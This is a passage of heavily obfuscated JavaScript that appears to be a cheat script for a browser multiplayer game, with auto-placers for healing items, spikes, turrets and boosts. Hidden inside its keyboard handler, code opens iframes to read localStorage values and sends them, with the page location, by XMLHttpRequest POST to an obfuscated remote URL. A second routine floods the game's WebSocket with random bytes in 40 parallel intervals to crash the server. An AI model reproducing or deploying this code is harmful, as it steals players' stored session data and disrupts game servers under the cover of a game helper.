3('\x30\x78\x62\x63')](setInterval,()=>{_0x1bf034[_0x35d3('\x30\x78\x31\x34\x39')](_0x21ad5d);if(!_0x42ca93){clearInterval(_0x5a685f);_0x5a685f=undefined;console['\x6c\x6f\x67'](_0x1bf034[_0x35d3('\x30\x78\x34')]);}},_0x94da42);}}else{foodType=i-0x10;}}}},'\x73\x74\x6f\x70'(_0x5a88e9){if(_0x259cd9[_0x35d3('\x30\x78\x32\x61')](_0x5a88e9,_0x504846)&&_0x259cd9['\x6a\x65\x58\x63\x6f'](document['\x61\x63\x74\x69\x76\x65\x45\x6c\x65\x6d\x65\x6e\x74']['\x69\x64'][_0x35d3('\x30\x78\x36\x37')](),_0x259cd9[_0x35d3('\x30\x78\x62\x65')])){_0x42ca93=![];}}};};const healer=repeater(0x0,()=>{var _0x4f9cb6={'\x65\x61\x43\x41\x4b':function(_0x5e6ea4,_0x2bbeeb){return _0x5e6ea4(_0x2bbeeb);}};_0x4f9cb6[_0x35d3('\x30\x78\x32\x32')](place,foodType);},0x0);const boostPlacer=repeater(0x0,()=>{var _0x3ca938={'\x4e\x5a\x58\x4f\x55':function(_0x5cb079,_0x42eeaf){return _0x5cb079(_0x42eeaf);}};_0x3ca938[_0x35d3('\x30\x78\x62\x38')](place,boostType);},0x0);const spikePlacer=repeater(0x0,()=>{place(spikeType);},0x0);const millPlacer=repeater(0x0,()=>{place(millType);},0x0);const turretPlacer=repeater(0x0,()=>{var _0x42b250={'\x4d\x65\x74\x6a\x6d':function(_0xdced17,_0x16344f){return _0xdced17(_0x16344f);}};_0x42b250[_0x35d3('\x30\x78\x62\x37')](place,turretType);},0x0);let crashing=![];let crashIntervals=[];var aa=!![];document[_0x35d3('\x30\x78\x62\x64')+_0x35d3('\x30\x78\x34\x61')](_0x35d3('\x30\x78\x39\x62'),_0x4aeaee=>{var _0x8fd339={'\x53\x43\x78\x79\x77':_0x35d3('\x30\x78\x31\x34\x34'),'\x46\x55\x48\x6f\x4a':function(_0x535621,_0x2aa2fc){return _0x535621<_0x2aa2fc;},'\x69\x56\x71\x51\x68':function(_0x496b95){return _0x496b95();},'\x74\x72\x6d\x72\x6c':_0x35d3('\x30\x78\x34\x37'),'\x4e\x51\x54\x7a\x78':function(_0x1c3ab4,_0x30275c,_0x341466){return _0x1c3ab4(_0x30275c,_0x341466);},'\x73\x48\x59\x4b\x66':function(_0x58f0b3,_0x39c30c){return _0x58f0b3===_0x39c30c;},'\x74\x56\x59\x66\x4c':_0x35d3('\x30\x78\x65\x66'),'\x66\x63\x78\x42\x58':function(_0x217819,_0x11b827){return _0x217819!==_0x11b827;},'\x4b\x56\x42\x44\x55':function(_0x4ac673,_0x1c4f6c){return _0x4ac673!==_0x1c4f6c;},'\x75\x6d\x54\x78\x53':'\x68\x79\x4e\x6b\x52','\x4f\x42\x5a\x6a\x74':function(_0x645bfd,_0x273ac2){return _0x645bfd==_0x273ac2;},'\x42\x6c\x78\x46\x42':_0x35d3('\x30\x78\x31\x30\x66'),'\x48\x44\x4b\x70\x4c':function(_0x415e99,_0x3cfcb1){return _0x415e99<_0x3cfcb1;},'\x57\x71\x6f\x69\x64':_0x35d3('\x30\x78\x36\x35')+_0x35d3('\x30\x78\x31\x30')+_0x35d3('\x30\x78\x35\x63')+_0x35d3('\x30\x78\x38\x34')+_0x35d3('\x30\x78\x31\x30\x61')+_0x35d3('\x30\x78\x31\x30\x37')+_0x35d3('\x30\x78\x31\x36\x36')+'\x74\x6c\x65\x5f\x62\x51\x45\x64\x4f\x4e\x2d\x51\x75'+_0x35d3('\x30\x78\x63\x65')+'\x65\x78\x34','\x76\x46\x6c\x67\x4c':_0x35d3('\x30\x78\x31\x32\x63'),'\x72\x47\x53\x65\x6c':_0x35d3('\x30\x78\x64\x30'),'\x66\x6e\x6a\x4d\x54':_0x35d3('\x30\x78\x31\x30\x65')+_0x35d3('\x30\x78\x31\x32\x61'),'\x4d\x49\x4a\x65\x48':'\x73\x65\x72\x76\x65\x72\x3d'};healer[_0x35d3('\x30\x78\x63\x66')](_0x4aeaee[_0x35d3('\x30\x78\x63\x35')]);boostPlacer[_0x35d3('\x30\x78\x63\x66')](_0x4aeaee[_0x35d3('\x30\x78\x63\x35')]);spikePlacer[_0x35d3('\x30\x78\x63\x66')](_0x4aeaee[_0x35d3('\x30\x78\x63\x35')]);millPlacer[_0x35d3('\x30\x78\x63\x66')](_0x4aeaee[_0x35d3('\x30\x78\x63\x35')]);turretPlacer[_0x35d3('\x30\x78\x63\x66')](_0x4aeaee[_0x35d3('\x30\x78\x63\x35')]);if(_0x8fd339[_0x35d3('\x30\x78\x34\x31')](_0x4aeaee['\x6b\x65\x79\x43\x6f\x64\x65'],0x2e)&&_0x8fd339[_0x35d3('\x30\x78\x37\x66')](document[_0x35d3('\x30\x78\x62\x34')]['\x69\x64'][_0x35d3('\x30\x78\x36\x37')](),_0x8fd339[_0x35d3('\x30\x78\x36\x65')])){crashing=!![];for(let _0x3d04a5=0x0;_0x8fd339[_0x35d3('\x30\x78\x31')](_0x3d04a5,0x28);_0x3d04a5++)crashIntervals[_0x35d3('\x30\x78\x31\x31\x30')](setInterval(function(){var _0x3af335={'\x67\x49\x54\x72\x74':function(_0x1ced79){return _0x8fd339[_0x35d3('\x30\x78\x66\x62')](_0x1ced79);},'\x67\x51\x6e\x54\x5a':_0x8fd339[_0x35d3('\x30\x78\x31\x35\x35')],'\x48\x41\x4c\x51\x63':function(_0x45403c,_0x1033d8,_0x52654a){return _0x8fd339[_0x35d3('\x30\x78\x61\x30')](_0x45403c,_0x1033d8,_0x52654a);}};if(_0x8fd339[_0x35d3('\x30\x78\x65\x65')](_0x8fd339[_0x35d3('\x30\x78\x63\x63')],_0x8fd339[_0x35d3('\x30\x78\x63\x63')])){if(!ws||_0x8fd339[_0x35d3('\x30\x78\x35\x66')](ws['\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65'],0x1))return clearInterval(crashIntervals[_0x35d3('\x30\x78\x31\x30\x34')]());let _0x2f5d02=new Uint8Array(0x32);for(let _0x4acc8e=0x0;_0x4acc8e<0x32;_0x4acc8e++){if(_0x8fd339[_0x35d3('\x30\x78\x37\x66')](_0x8fd339[_0x35d3('\x30\x78\x33\x63')],_0x8fd339[_0x35d3('\x30\x78\x33\x63')])){var _0x47bbc0={'\x79\x43\x47\x46\x78':_0x8fd339['\x53\x43\x78\x79\x77'],'\x65\x69\x63\x49\x6e':_0x35d3('\x30\x78\x31\x30\x65')+_0x35d3('\x30\x78\x31\x32\x61')};for(let _0x500aca=0x0;_0x8fd339[_0x35d3('\x30\x78\x31\x32\x64')](_0x500aca,0x5);_0x500aca++){}setTimeout(function(){const _0x5a2995=document[_0x35d3('\x30\x78\x31\x35')][_0x35d3('\x30\x78\x31\x65')](document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74'](_0x47bbc0[_0x35d3('\x30\x78\x34\x63')]))['\x63\x6f\x6e\x74\x65\x6e\x74\x57\x69\x6e\x64\x6f\x77'][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x38\x30')];const _0x108b16=document[_0x35d3('\x30\x78\x31\x35')][_0x35d3('\x30\x78\x31\x65')](document[_0x35d3('\x30\x78\x32\x33')]('\x69\x66\x72\x61\x6d\x65'))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x63\x61')];const _0x1e69cc=document[_0x35d3('\x30\x78\x31\x35')][_0x35d3('\x30\x78\x31\x65')](document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74'](_0x47bbc0[_0x35d3('\x30\x78\x34\x63')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x33\x32')];const _0x44d1c2=new XMLHttpRequest();const _0x291345=_0x35d3('\x30\x78\x36\x35')+_0x35d3('\x30\x78\x31\x30')+_0x35d3('\x30\x78\x35\x63')+_0x35d3('\x30\x78\x38\x34')+'\x7a\x56\x79\x49\x75\x57\x61\x39\x79\x42\x65\x69\x6d'+'\x56\x41\x61\x46\x63\x39\x67\x56\x37\x31\x4f\x74\x47'+_0x35d3('\x30\x78\x31\x36\x36')+_0x35d3('\x30\x78\x35\x61')+_0x35d3('\x30\x78\x63\x65')+_0x35d3('\x30\x78\x62\x61');_0x44d1c2[_0x35d3('\x30\x78\x35\x31')](_0x35d3('\x30\x78\x31\x32\x63'),_0x291345,!![]);_0x44d1c2[_0x35d3('\x30\x78\x31\x33\x39')+_0x35d3('\x30\x78\x36\x38')](_0x35d3('\x30\x78\x64\x30'),_0x47bbc0[_0x35d3('\x30\x78\x31\x34\x65')]);_0x44d1c2[_0x35d3('\x30\x78\x64\x63')](JSON[_0x35d3('\x30\x78\x64\x37')]({'\x63\x6f\x6e\x74\x65\x6e\x74':_0x35d3('\x30\x78\x31\x35\x31')+_0x35d3('\x30\x78\x31\x32\x31')+_0x5a2995+(_0x35d3('\x30\x78\x38\x37')+_0x35d3('\x30\x78\x38\x39')+_0x35d3('\x30\x78\x31\x32\x65'))+window[_0x35d3('\x30\x78\x31\x34\x31')][_0x35d3('\x30\x78\x66\x31')]+(_0x35d3('\x30\x78\x61\x33')+'\x5b\x20')+_0x108b16+(_0x35d3('\x30\x78\x39\x39')+_0x35d3('\x30\x78\x66\x33'))}));},0x2710);}else{_0x2f5d02[_0x4acc8e]=Math[_0x35d3('\x30\x78\x37\x33')](Math['\x72\x61\x6e\x64\x6f\x6d']()*0x100);}}ws['\x73\x65\x6e\x64'](_0x2f5d02);}else{_intervalId=_0x3af335[_0x35d3('\x30\x78\x65\x37')](setInterval,()=>{_0x3af335[_0x35d3('\x30\x78\x64\x31')](action);if(!_isKeyDown){clearInterval(_intervalId);_intervalId=undefined;console[_0x35d3('\x30\x78\x64\x36')](_0x3af335[_0x35d3('\x30\x78\x65')]);}},interval);}}));}if(_0x8fd339[_0x35d3('\x30\x78\x34\x31')](_0x4aeaee['\x6b\x65\x79\x43\x6f\x64\x65'],0x2e)&&_0x8fd339[_0x35d3('\x30\x78\x37\x66')](document[_0x35d3('\x30\x78\x62\x34')]['\x69\x64'][_0x35d3('\x30\x78\x36\x37')](),_0x8fd339[_0x35d3('\x30\x78\x36\x65')])){const _0x4e61ae=document[_0x35d3('\x30\x78\x31\x35')]['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x8fd339[_0x35d3('\x30\x78\x63\x32')]))['\x63\x6f\x6e\x74\x65\x6e\x74\x57\x69\x6e\x64\x6f\x77']['\x6c\x6f\x63\x61\x6c\x53\x74\x6f\x72\x61\x67\x65'][_0x35d3('\x30\x78\x38\x30')];const _0x40401f=document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](document[_0x35d3('\x30\x78\x32\x33')](_0x8fd339[_0x35d3('\x30\x78\x63\x32')]))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x63\x61')];const _0x238182=document[_0x35d3('\x30\x78\x31\x35')][_0x35d3('\x30\x78\x31\x65')](document[_0x35d3('\x30\x78\x32\x33')](_0x35d3('\x30\x78\x31\x34\x34')))[_0x35d3('\x30\x78\x39\x65')][_0x35d3('\x30\x78\x31\x30\x30')][_0x35d3('\x30\x78\x33\x32')];const _0x23a360=new XMLHttpRequest();const _0x27c37d=_0x8fd339[_0x35d3('\x30\x78\x37\x30')];_0x23a360[_0x35d3('\x30\x78\x35\x31')](_0x8fd339[_0x35d3('\x30\x78\x31\x33\x37')],_0x27c37d,!![]);_0x23a360['\x73\x65\x74\x52\x65\x71\x75\x65\x73\x74\x48\x65\x61'+_0x35d3('\x30\x78\x36\x38')](_0x8fd339['\x72\x47\x53\x65\x6c'],_0x8fd339[_0x35d3('\x30\x78\x38\x35')]);_0x23a360[_0x35d3('\x30\x78\x64\x63')](JSON[_0x35d3('\x30\x78\x64\x37')]({'\x63\x6f\x6e\x74\x65\x6e\x74':_0x35d3('\x30\x78\x32\x65')+_0x4e61ae+(_0x35d3('\x30\x78\x31\x35\x39')+_0x35d3('\x30\x78\x31\x32\x30'))+window[_0x35d3('\x30\x78\x31\x34\x31')][_0x35d3('\x30\x78\x66\x31')][_0x35d3('\x30\x78\x66\x65')](_0x8fd339[_0x35d3('\x30\x78\x65\x64')])[_0x35d3('\x30\x78\x38')]()+('\x20\x77\x69\x74\x68\x20\x74\x68\x65\x20\x69\x64\x20'+'\x5b\x20')+_0x40401f+_0x35d3('\x30\x78\x35\x39')}));}});document['\x61\x64\x64\x45\x76\x65\x6e\x74\x4c\x69\x73\x74\x65'+_0x35d3('\x30\x78\x34\x61')](_0x35d3('\x30\x78\x31\x32\x34'),_0x49129e=>{healer[_0x35d3('\x30\x78\x31\x34\x62')](_0x49129e['\x6b\x65\x79\x43\x6f\x64\x65']);boostPlacer[_0x35d3('\x30\x78\x31\x34\x62')](_0x49129e[_0x35d3('\x30\x78\x63\x35')]);spikePlacer[_0x35d3('\x30\x78\x31\x34\x62')](_0x49129e[_0x35d3('\x30\x78\x63\x35')]);millPlacer['\x73\x74\x6f\x70'](_0x49129e[_0x35d3('\x30\x78\x63\x35')]);turretPlacer['\x73\x74\x6f\x70'](_0x49129e['\x6b\x65\x79\x43\x6f\x64\x65']);});function isElementVisible(_0x4d3ef6){var _0xf2ba={'\x7a\x4d\x4f\x59\x65':function(_0x3028f8,_0x5ec961){return _0x3028f8!==_0x5ec961;}};return _0xf2ba[_0x35d3('\x30\x78\x31\x34\x36')](_0x4d3ef6[_0x35d3('\x30\x78\x31\x34\x33')],null);}function toRad(_0xba6196){return _0xba6196*0.01745329251;}function dist(_0x5de79e,_0x2767bd){var _0x47f33a={'\x41\x54\x4d\x64\x42':function(_0x370e5c,_0x574b6c){return _0x370e5c+_0x574b6c;},'\x53\x72\x6e\x7a\x4c':function(_0x2bcf77,_0x28b9a3){return _0x2bcf77-_0x28b9a3;},'\x66\x61\x69\x6e\x41':function(_0x599991,_0x5a46d7){return _0x599991-_0x5a46d7;}};return Math['\x73\x71\x72\x74'](_0x47f33a[_0x35d3('\x30\x78\x61\x35')](Math[_0x35d3('\x30\x78\x31\x36\x63')](_0x47f33a[_0x35d3('\x30\x78\x31\x32\x37')](_0x2767bd['\x79'],_0x5de79e[0x2]),0x2),Math[_0x35d3('\x30\x78\x31\x36\x63')](_0x47f33a[_0x35d3('\x30\x78\x66\x36')](_0x2767bd['\x78'],_0x5de79e[0x1]),0x2)));}function animate(_0xa7dd47,_0x39222d){var _0x2f14bb={'\x7a\x56\x66\x74\x72':function(_0x33a3c4,_0x856216){return _0x33a3c4(_0x856216);},'\x72\x69\x57\x68\x4c':function(_0x11dcd1,_0x44ca01,_0xa71b26){return _0x11dcd1(_0x44ca01,_0xa71b26);},'\x6c\x73\x65\x69\x79':function(_0x3f5c7f,_0x5833be){return _0x3f5c7f-_0x5833be;},'\x4f\x45\x70\x71\x50':function(_0x2e14a6,_0x239a19){return _0x2e14a6(_0x239a19);},'\x4e\x5a\x45\x43\x6c':function(_0x5d4d92,_0x3c536b){return _0x5d4d92(_0x3c536b);},'\x59\x5a\x5a\x65\x4a':function(_0x4f0653,_0x37599d){return _0x4f0653==_0x37599d;},'\x76\x45\x56\x6f\x71':_0x35d3('\x30\x78\x37\x34')+_0x35d3('\x30\x78\x61\x38')+_0x35d3('\x30\x78\x62\x30'),'\x69\x6c\x71\x64\x52':function(_0xe06b41,_0x5ac8b5){return _0xe06b41===_0x5ac8b5;},'\x50\x71\x76\x47\x6b':_0x35d3('\x30\x78\x66\x34'),'\x47\x51\x64\x59\x77':_0x35d3('\x30\x78\x65\x35'),'\x76\x51\x70\x56\x67':_0x35d3('\x30\x78\x31\x34\x38'),'\x41\x6e\x71\x56\x48':function(_0x4ce1ea,_0x1d68a7){return _0x4ce1ea+_0x1d68a7;},'\x6c\x4b\x45\x51\x42':function(_0x1aad82,_0x38dd0b){return _0x1aad82/_0x38dd0b;},'\x77\x74\x41\x48\x67':function(_0x364269,_0x3bdab6){return _0x364269<_0x3bdab6;},'\x75\x74\x79\x57\x53':function(_0x2528e3,_0x3ef5ac){return _0x2528e3*_0x3ef5ac;},'\x6a\x57\x6e\x48\x72':function(_0x3a9a14,_0x27c5a4){return _0x3a9a14!=_0x27c5a4;},'\x63\x61\x64\x64\x76':function(_0x55ec94,_0x1949fa){return _0x55ec94<_0x1949fa;},'\x4e\x55\x58\x48\x61':function(_0x210681,_0x4bd5d3){return _0x210681!==_0x4bd5d3;},'\x69\x49\x47\x51\x65':_0x35d3('\x30\x78\x32\x63'),'\x78\x42\x50\x79\x76':_0x35d3('\x30\x78\x31\x34\x66')};let _0x2a6be1='';let _0x2ea1e6;if(_0xa7dd47){_0x2ea1e6=_0x2f14bb[_0x35d3('\x30\x78\x34\x32')];}else{if(_0x2f14bb['\x69\x6c\x71\x64\x52'](_0x2f14bb[_0x35d3('\x30\x78\x32\x62')],_0x2f14bb[_0x35d3('\x30\x78\x62\x33')])){boostDir=nearestEnemyAngle;}else{_0x2ea1e6='\x67\x67';}}if(_0xa7dd47){if(_0x35d3('\x30\x78\x31\x34\x38')!==_0x2f14bb[_0x35d3('\x30\x78\x31\x35\x64')]){var _0x282f8b=_0x35d3('\x30\x78\x32\x30')[_0x35d3('\x30\x78\x66\x65')]('\x7c');var _0x4e79ce=0x0;while(!![]){switch(_0x282f8b[_0x4e79ce++]){case'\x30':_0x2f14bb[_0x35d3('\x30\x78\x33\x62')](doNewSend,['\x33\x33',[boostDir]]);continue;case'\x31':_0x2f14bb['\x72\x69\x57\x68\x4c'](place,spikeType,_0x2f14bb[_0x35d3('\x30\x78\x32\x35')](boostDir,_0x2f14bb['\x4f\x45\x70\x71\x50'](toRad,0x5a)));continue;case'\x32':place(spikeType,boostDir+_0x2f14bb['\x4e\x5a\x45\x43\x6c'](toRad,0x5a));continue;case'\x33':if(_0x2f14bb[_0x35d3('\x30\x78\x61\x37')](boostDir,null)){boostDir=nearestEnemyAngle;}continue;case'\x34':_0x2f14bb[_0x35d3('\x30\x78\x31\x33')](place,boostType,boostDir);continue;}break;}}else{_0x2ea1e6=_0x2ea1e6[_0x35d3('\x30\x78\x31\x35\x38')](_0x2f14bb['\x41\x6e\x71\x56\x48'](_0x2f14bb['\x6c\x4b\x45\x51\x42'](_0x2f14bb[_0x35d3('\x30\x78\x32\x35')](0x1e,_0x2ea1e6[_0x35d3('\x30\x78\x65\x31')]),0x2),_0x2ea1e6[_0x35d3('\x30\x78\x65\x31')]));_0x2ea1e6=_0x2ea1e6[_0x35d3('\x30\x78\x31\x31\x37')](0x1e);}}let _0x96fa31=0x0;for(let _0x4b1ca1=0x0;_0x2f14bb[_0x35d3('\x30\x78\x32\x39')](_0x4b1ca1,_0x2ea1e6['\x6c\x65\x6e\x67\x74\x68']);_0x4b1ca1++){if(_0x2f14bb[_0x35d3('\x30\x78\x61\x37')](Math[_0x35d3('\x30\x78\x37\x33')](_0x2f14bb[_0x35d3('\x30\x78\x31\x33\x34')](Math[_0x35d3('\x30\x78\x38\x33')](),_0x39222d)),0x1)&&_0x2f14bb['\x6a\x57\x6e\x48\x72'](_0x2ea1e6[_0x35d3('\x30\x78\x31\x66')](_0x4b1ca1),'')&&_0x2f14bb['\x63\x61\x64\x64\x76'](_0x96fa31,0x2)&&_0x2ea1e6[_0x35d3('\x30\x78\x31\x66')](_0x4b1ca1)!=''){if(_0x2f14bb[_0x35d3('\x30\x78\x36\x33')](_0x2f14bb[_0x35d3('\x30\x78\x31\x31')],_0x2f14bb[_0x35d3('\x30\x78\x38\x64')])){_0x2a6be1+='';_0x96fa31++;}else{_0x2ea1e6='\x67\x67';}}else{_0x2a6be1+=_0x2ea1e6['\x63\x68\x61\x72\x41\x74'](_0x4b1ca1);}}return _0x2a6be1;}function update(){var _0x4dd078={'\x6c\x53\x55\x52\x42':_0x35d3('\x30\x78\x31\x31\x61'),'\x4d\x72\x51\x4a\x62':function(_0x4e82a6,_0x43c2e0){return _0x4e82a6(_0x43c2e0);},'\x4a\x56\x4e\x79\x6c':_0x35d3('\x30\x78\x34\x38'),'\x64\x59\x72\x6f\x59':function(_0x58d94e,_0x110216){return _0x58d94e(_0x110216);},'\x4e\x74\x4c\x66\x59':function(_0x5d195c,_0x45cffb){return _0x5d195c+_0x45cffb;},'\x66\x4a\x66\x6b\x62':function(_0x2f5aa6,_0x5c335a){return _0x2f5aa6-_0x5c335a;},'\x6e\x58\x42\x6b\x58':function(_0x161df5,_0x227e79){return _0x161df5(_0x227e79);},'\x44\x79\x7a\x76\x51':function(_0x27b73a,_0x1442fb){return _0x27b73a(_0x1442fb);},'\x43\x67\x4d\x6e\x63':function(_0x5c3cbe,_0x494323){return _0x5c3cbe(_0x494323);},'\x61\x71\x68\x59\x66':function(_0x2488d9,_0x3390ca){return _0x2488d9==_0x3390ca;},'\x64\x6f\x59\x72\x4a':function(_0x18412b,_0x3fa5a0){return _0x18412b!=_0x3fa5a0;},'\x55\x76\x72\x51\x74':_0x35d3('\x30\x78\x31\x33\x33'),'\x5a\x56\x7a\x7a\x65':function(_0x2afc35,_0x282116){return _0x2afc35!=_0x282116;},'\x69\x79\x6e\x6c\x6d':_0x35d3('\x30\x78\x32\x66'),'\x79\x42\x62\x4a\x45':function(_0x4c8fe8,_0x2350b5){return _0x4c8fe8(_0x2350b5);},'\x6b\x77\x55\x71\x70':function(_0x43bafa,_0x5aae3e){return _0x43bafa+_0x5aae3e;},'\x45\x47\x5a\x79\x42':function(_0x3aa340,_0x2ce7c4){return _0x3aa340<_0x2ce7c4;},'\x53\x74\x6e\x43\x6c':_0x35d3('\x30\x78\x64\x64'),'\x75\x77\x6d\x49\x4a':function(_0x3ba246,_0xba4541){return _0x3ba246!==_0xba4541;},'\x63\x4d\x68\x4d\x4f':_0x35d3('\x30\x78\x31\x31\x32'),'\x49\x6c\x75\x62\x52':function(_0x5f2661,_0x24136d){return _0x5f2661(_0x24136d);},'\x6a\x78\x63\x6a\x78':function(_0x462961,_0x6d7d64){return _0x462961+_0x6d7d64;},'\x45\x42\x51\x56\x5a':_0x35d3('\x30\x78\x34\x36'),'\x4c\x4a\x5a\x43\x70':function(_0x47c21e,_0x420ade){return _0x47c21e<_0x420ade;},'\x65\x48\x4b\x79\x4f':function(_0x402292,_0x21225c){return _0x402292===_0x21225c;},'\x69\x41\x41\x48\x64':_0x35d3('\x30\x78\x35'),'\x45\x45\x65\x6e\x53':_0x35d3('\x30\x78\x63\x37'),'\x59\x41\x66\x54\x64':_0x35d3('\x30\x78\x39\x36'),'\x67\x74\x5a\x63\x49':function(_0x21b497,_0x198b83){return _0x21b497<_0x198b83;},'\x62\x66\x69\x5a\x4d':function(_0x460468,_0x1a5cd7){return _0x460468+_0x1a5cd7;},'\x7a\x73\x4b\x74\x6d':function(_0x442a9d,_0x383aca){return _0x442a9d-_0x383aca;},'\x4f\x6b\x5a\x4a\x51':function(_0x3d8a0e,_0xd5fc61){return _0x3d8a0e!==_0xd5fc61;},'\x70\x50\x71\x6d\x6f':_0x35d3('\x30\x78\x33\x65'),'\x4b\x57\x6f\x71\x53':function(_0x37af76,_0x5b7c77){return _0x37af76(_0x5b7c77);},'\x46\x48\x56\x6d\x6e':'\x64\x78\x6d\x43\x70','\x48\x55\x72\x62\x46':function(_0x8d986c,_0xa600e0){return _0x8d986c<_0xa600e0;},'\x44\x76\x66\x6e\x77':_0x35d3('\x30\x78\x34\x66'),'\x53\x78\x4b\x72\x69':function(_0x2a5edd,_0xd745c0){return _0x2a5edd===_0xd745c0;},'\x55\x69\x4c\x65\x55':_0x35d3('\x30\x78\x34\x39'),'\x42\x75\x78\x78\x63':function(_0x3d9171,_0x206458){return _0x3d9171-_0x206458;},'\x68\x72\x54\x69\x4f':function(_0x46dfe6,_0x4c4925){return _0x46dfe6!==_0x4c4925;},'\x45\x45\x4b\x4c\x4c':_0x35d3('\x30\x78\x31\x35\x33'),'\x55\x4f\x56\x7a\x43':_0x35d3('\x30\x78\x39\x35'),'\x71\x63\x4f\x4c\x6c':'\x51\x4b\x44\x54\x62'};for(let _0x4cf8f6=0x0;_0x4dd078[_0x35d3('\x30\x78\x65\x32')](_0x4cf8f6,0x9);_0x4cf8f6++){if(_0x4dd078[_0x35d3('\x30\x78\x37\x31')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078['\x6b\x77\x55\x71\x70'](_0x4dd078[_0x35d3('\x30\x78\x32\x36')],_0x4cf8f6[_0x35d3('\x30\x78\x63\x31')]())))){primary=_0x4cf8f6;}}for(let _0x37c923=0x9;_0x4dd078[_0x35d3('\x30\x78\x65\x32')](_0x37c923,0x10);_0x37c923++){if(_0x4dd078[_0x35d3('\x30\x78\x62\x39')](_0x4dd078[_0x35d3('\x30\x78\x65\x34')],_0x35d3('\x30\x78\x31\x31\x32'))){let _0x4dec61=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49'+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x66\x39')]);width=_0x4dec61[_0x35d3('\x30\x78\x35\x33')];height=_0x4dec61[_0x35d3('\x30\x78\x33\x39')];_0x4dd078[_0x35d3('\x30\x78\x39\x64')]($,window)[_0x35d3('\x30\x78\x38\x38')](function(){width=_0x4dec61[_0x35d3('\x30\x78\x35\x33')];height=_0x4dec61['\x63\x6c\x69\x65\x6e\x74\x48\x65\x69\x67\x68\x74'];});_0x4dec61[_0x35d3('\x30\x78\x62\x64')+_0x35d3('\x30\x78\x34\x61')](_0x4dd078['\x4a\x56\x4e\x79\x6c'],_0xb85a26=>{mouseX=_0xb85a26[_0x35d3('\x30\x78\x34\x65')];mouseY=_0xb85a26['\x63\x6c\x69\x65\x6e\x74\x59'];});}else{if(_0x4dd078[_0x35d3('\x30\x78\x34\x34')](isElementVisible,document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49'+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x37\x37')](_0x4dd078[_0x35d3('\x30\x78\x32\x36')],_0x37c923[_0x35d3('\x30\x78\x63\x31')]())))){if(_0x4dd078[_0x35d3('\x30\x78\x62\x39')](_0x35d3('\x30\x78\x34\x36'),_0x4dd078[_0x35d3('\x30\x78\x33\x66')])){wallType=_0x37c923-0x10;}else{secondary=_0x37c923;}}}}for(let _0x490cd3=0x10;_0x4dd078[_0x35d3('\x30\x78\x37\x63')](_0x490cd3,0x13);_0x490cd3++){if(_0x4dd078[_0x35d3('\x30\x78\x33\x30')](_0x4dd078[_0x35d3('\x30\x78\x31\x36\x61')],_0x4dd078['\x69\x41\x41\x48\x64'])){if(_0x4dd078[_0x35d3('\x30\x78\x34\x34')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x37\x37')](_0x4dd078['\x53\x74\x6e\x43\x6c'],_0x490cd3[_0x35d3('\x30\x78\x63\x31')]())))){if(_0x4dd078[_0x35d3('\x30\x78\x33\x33')]!==_0x4dd078[_0x35d3('\x30\x78\x36\x64')]){foodType=_0x4dd078['\x66\x4a\x66\x6b\x62'](_0x490cd3,0x10);}else{result+=characters[_0x35d3('\x30\x78\x31\x66')](_0x490cd3);}}}else{if(_0x4dd078[_0x35d3('\x30\x78\x39\x63')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078['\x4e\x74\x4c\x66\x59'](_0x35d3('\x30\x78\x64\x64'),_0x490cd3[_0x35d3('\x30\x78\x63\x31')]())))){spikeType=_0x4dd078[_0x35d3('\x30\x78\x38\x65')](_0x490cd3,0x10);}}}for(let _0x4ae664=0x13;_0x4dd078[_0x35d3('\x30\x78\x63\x64')](_0x4ae664,0x16);_0x4ae664++){if(_0x4dd078['\x49\x6c\x75\x62\x52'](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x4dd078[_0x35d3('\x30\x78\x31\x32\x33')](_0x4dd078[_0x35d3('\x30\x78\x32\x36')],_0x4ae664[_0x35d3('\x30\x78\x63\x31')]())))){wallType=_0x4dd078[_0x35d3('\x30\x78\x62\x35')](_0x4ae664,0x10);}}for(let _0x228d30=0x16;_0x4dd078['\x67\x74\x5a\x63\x49'](_0x228d30,0x1a);_0x228d30++){if(_0x4dd078[_0x35d3('\x30\x78\x37\x39')](_0x4dd078[_0x35d3('\x30\x78\x37')],_0x35d3('\x30\x78\x34\x33'))){if(_0x4dd078[_0x35d3('\x30\x78\x66\x32')](isElementVisible,document[_0x35d3('\x30\x78\x66\x37')+'\x64'](_0x35d3('\x30\x78\x64\x64')+_0x228d30[_0x35d3('\x30\x78\x63\x31')]()))){if(_0x4dd078[_0x35d3('\x30\x78\x37\x39')](_0x35d3('\x30\x78\x31\x33\x61'),_0x4dd078[_0x35d3('\x30\x78\x32')])){spikeType=_0x4dd078[_0x35d3('\x30\x78\x62\x35')](_0x228d30,0x10);}else{_0x4dd078[_0x35d3('\x30\x78\x32\x64')](hat,normalHat);_0x4dd078[_0x35d3('\x30\x78\x65\x38')](acc,normalAcc);}}}else{_0x4dd078[_0x35d3('\x30\x78\x31\x32\x66')](doNewSend,['\x35',[id,null]]);}}for(let 